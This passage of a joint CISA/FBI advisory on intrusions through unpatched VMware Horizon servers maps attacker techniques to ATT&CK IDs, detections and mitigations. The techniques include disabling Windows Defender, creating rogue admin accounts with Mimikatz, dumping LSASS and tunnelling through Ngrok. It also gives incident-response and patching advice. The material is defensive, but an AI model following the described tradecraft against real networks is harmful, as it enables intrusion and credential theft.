Command and Scripting Interpreter: PowerShell	T1059.001	The actors ran PowerShell commands that added an exclusion rule to Windows Defender. The actors executed PowerShell on the AD to obtain a list of machines on the domain.	Mitigation: Disable or remove PowerShell for non-administrative users [M1042],[M1026] or enable code-signing to execute only signed scripts [M1045]. Mitigation: Employ anti-malware to automatically detect and quarantine malicious scripts [M1049].
Persistence
Technique Title	ID	Use	Recommendations
Account Manipulation	T1098	The actors changed the password for the local administrator account on several hosts.	Mitigation: Use multifactor authentication for user and privileged accounts [M1032]. Detection: Monitor events for changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728, and 4670. Monitor for modification of accounts in correlation with other suspicious activity [DS0002].
Create Account: Local Account	T1136.001	The actors’ malware can create local user accounts.	Mitigation: Configure access controls and firewalls to limit access to domain controllers and systems used to create and manage accounts. Detection: Monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add , useradd, and dscl -create [DS0017]. Detection: Enable logging for new user creation [DS0002].
Create Account: Domain Account	T1136.002	The actors used Mimikatz to create a rogue domain administrator account.	Mitigation: Configure access controls and firewalls to limit access to domain controllers and systems used to create and manage accounts. Detection: Enable logging for new user creation, especially domain administrator accounts [DS0002].
Scheduled Task/Job: Scheduled Task	T1053.005	The actors’ exploit payload created Scheduled Task RuntimeBrokerService.exe, which executed RuntimeBroker.exe daily as SYSTEM.	Mitigation: Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM [M1028]. Detection: Monitor for newly constructed processes and/or command-lines that execute from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows [DS0009] Detection: Monitor for newly constructed scheduled jobs by enabling the Microsoft-Windows-TaskScheduler/Operational setting within the event logging service [DS0003].
Valid Accounts: Default Accounts	T1078.001	The actors used built-in Windows user account DefaultAccount.	Mitigation: Change default usernames and passwords immediately after the installation and before deployment to a production environment [M1027]. Detection: Develop rules to monitor logon behavior across default accounts that have been activated or logged into [DS0028].
Defense Evasion
Technique Title	ID	Use	Recommendations
Impair Defenses: Disable or Modify Tools	T1562.001	The actors added an exclusion rule to Windows Defender. The tool allowlisted the entire c:\drive, enabling the actors to bypass virus scans for tools they downloaded to the c:\drive. The actors manually disabled Windows Defender via the GUI.	Mitigation: Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with security services. [M1018]. Detection: Monitor for changes made to Windows Registry keys and/or values related to services and startup programs that correspond to security tools such as HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender [DS0024]. Detection: Monitor for telemetry that provides context for modification or deletion of information related to security software processes or services such as Windows Defender definition files in Windows and System log files in Linux [DS0013]. Detection: Monitor processes for unexpected termination related to security tools/services [DS0009].
Indicator Removal on Host: File Deletion	T1070.004	The actors removed malicious file mde.ps1 from the dis.	Detection: Monitor executed commands and arguments for actions that could be utilized to unlink, rename, or delete files [DS0017]. Detection: Monitor for unexpected deletion of files from the system [DS0022].
Credential Access
Technique Title	ID	Use	Recommendations
OS Credential Dumping: LSASS Memory	T1003.001	The actors were observed trying to dump LSASS process.	Mitigation: With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping [M1043] Mitigation: On Windows 10, enable Attack Surface Reduction (ASR) rules to secure LSASS and prevent credential stealing [M1040]. Mitigation: Ensure that local administrator accounts have complex, unique passwords across all systems on the network [M1027]. Detection: Monitor for unexpected processes interacting with LSASS.exe. Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. [DS0009]. Detection: Monitor executed commands and arguments that may attempt to access credential material stored in the process memory of the LSASS [DS0017].
Credentials from Password Stores	T1555	The actors used Mimikatz to harvest credentials.	Mitigation: Organizations may consider weighing the risk of storing credentials in password stores and web browsers. If system, software, or web browser credential disclosure is a significant concern, technical controls, policy, and user training may be used to prevent storage of credentials in improper locations [M1027]. Detection: Monitor for processes being accessed that may search for common password storage locations to obtain user credentials [DS0009]. Detection: Monitor executed commands and arguments that may search for common password storage locations to obtain user credentials [DS0017].
Discovery
Technique Title	ID	Use	Recommendations
Remote System Discovery	T1018	The actors executed a PowerShell command on the AD to obtain a list of all machines attached to the domain.	Detection: Monitor executed commands and arguments that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement [DS0017]. Detection: Monitor for newly constructed network connections associated with pings/scans that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement [DS0029]. Detection: Monitor for newly executed processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession [DS0009].
System Network Configuration Discovery: Internet Connection Discovery	T1016.001	The actors’ malware tests for internet connectivity by pinging 8.8.8.8.	Mitigation: Monitor executed commands, arguments [DS0017] and executed processes (e.g., tracert or ping) [DS0009] that may check for internet connectivity on compromised systems.
Lateral Movement
Technique Title	ID	Use	Recommendations
Remote Services: Remote Desktop Protocol	T1021.001	The actors used RDP to move laterally to multiple hosts on the network.	Mitigation: Use MFA for remote logins [M1032]. Mitigation: Disable the RDP service if it is unnecessary [M1042]. Mitigation: Do not leave RDP accessible from the internet. Enable firewall rules to block RDP traffic between network security zones within a network [M1030]. Mitigation: Consider removing the local Administrators group from the list of groups allowed to log in through RDP [M1026]. Detection: Monitor for user accounts logged into systems associated with RDP (ex: Windows EID 4624 Logon Type 10). Other factors, such as access patterns (ex: multiple systems over a relatively short period of time) and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP [DS0028].
Command and Control
Technique Title	ID	Use	Recommendations
Proxy	T1090	The actors used Ngrok to proxy RDP connections and to perform command and control.	Mitigation: Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists [M1037]. Detection: Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure) [DS0029].
Ingress Tool Transfer	T1105	The actors downloaded malware and multiple tools to the network, including PsExec, Mimikatz, and Ngrok.	Mitigation: Employ anti-malware to automatically detect and quarantine malicious scripts [M1049].

INCIDENT RESPONSE

If suspected initial access or compromise is detected based on IOCs or TTPs in this CSA, CISA encourages organizations to assume lateral movement by threat actors and investigate connected systems and the DC.

CISA recommends organizations apply the following steps before applying any mitigations, including patching.

Immediately isolate affected systems.
Collect and review relevant logs, data, and artifacts. Take a memory capture of the device(s) and a forensic image capture for detailed analysis.
Consider soliciting support from a third-party incident response organization that can provide subject matter expertise to ensure the actor is eradicated from the network and to avoid residual issues that could enable follow-on exploitation.
Report incidents to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or your local FBI field office, or FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov.

Mitigations

CISA and FBI recommend implementing the mitigations below and in Table 1 to improve your organization's cybersecurity posture on the basis of threat actor behaviors.

Install updated builds to ensure affected VMware Horizon and UAG systems are updated to the latest version.
- If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat those VMware Horizon systems as compromised. Follow the pro-active incident response procedures outlined above prior to applying updates. If no compromise is detected, apply these updates as soon as possible.
  - See VMware Security Advisory VMSA-2021-0028.13 and VMware Knowledge Base (KB) 87073 to determine which VMware Horizon components are vulnerable.
  - Note: Until the update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible.
  - If upgrading is not immediately feasible, see KB87073 and KB87092 for vendor-provided temporary workarounds. Implement temporary solutions using an account with administrative privileges. Note that these temporary solutions should not be treated as permanent fixes; vulnerable components should be upgraded to the latest build as soon as possible.
  - Prior to implementing any temporary solution, ensure appropriate backups have been completed.
  - Verify successful implementation of mitigations by executing the vendor supplied script Horizon_Windows_Log4j_Mitigations.zip without parameters to ensure that no vulnerabilities remain. See KB87073 for details.
Keep all software up to date and prioritize patching known exploited vulnerabilities (KEVs).
Minimize the internet-facing attack surface by hosting essential services on a segregated DMZ, ensuring strict network perimeter access controls, and not hosting internet-facing services that are not essential to business operations. Where possible, implement regularly updated web application firewalls (WAF) in front of public-facing services. WAFs can protect against web-based exploitation using signatures and heuristics that are likely to block or alert on malicious traffic.
Use best practices for identity and access management (IAM) by implementing phishing resistant multifactor authentication (MFA), enforcing use of strong passwords, regularly auditing administrator accounts and permissions, and limiting user access through the principle of least privilege. Disable inactive accounts uniformly across the AD, MFA systems, etc.
- If using Windows 10 version 1607 or Windows Server 2016 or later, monitor or disable Windows DefaultAccount, also known as the Default System Managed Account (DSMA).
Audit domain controllers to log successful Kerberos Ticket Granting Service (TGS) requests and ensure the events are monitored for anomalous activity.
- Secure accounts.
- Enforce the principle of least privilege. Administrator accounts should have the minimum permission necessary to complete their tasks.
- Ensure there are unique and distinct administrative accounts for each set of administrative tasks.
- Create non-privileged accounts for privileged users and ensure they use the non-privileged accounts for all non-privileged access (e.g., web browsing, email access).
Create a deny list of known compromised credentials and prevent users from using known-compromised passwords.
Secure credentials by restricting where accounts and credentials can be used and by using local device credential protection features.
- Use virtualizing solutions on modern hardware and software to ensure credentials are securely stored.
- Ensure storage of clear text passwords in LSASS memory is disabled. Note: For Windows 8, this is enabled by default. For more information see Microsoft Security Advisory Update to Improve Credentials Protection and Management.
- Consider disabling or limiting NTLM and WDigest Authentication.
- Implement Credential Guard for Windows 10 and Server 2016 (refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).
- Minimize the AD attack surface to reduce malicious ticket-granting activity. Malicious activity such as “Kerberoasting” takes advantage of Kerberos’ TGS and can be used to obtain hashed credentials that threat actors attempt to crack.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

Select an ATT&CK technique described in this advisory (see table 1).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

References

[1] MITRE ATT&CK Version 11: Software – Ngrok

Revisions

Initial Version: November 16, 2022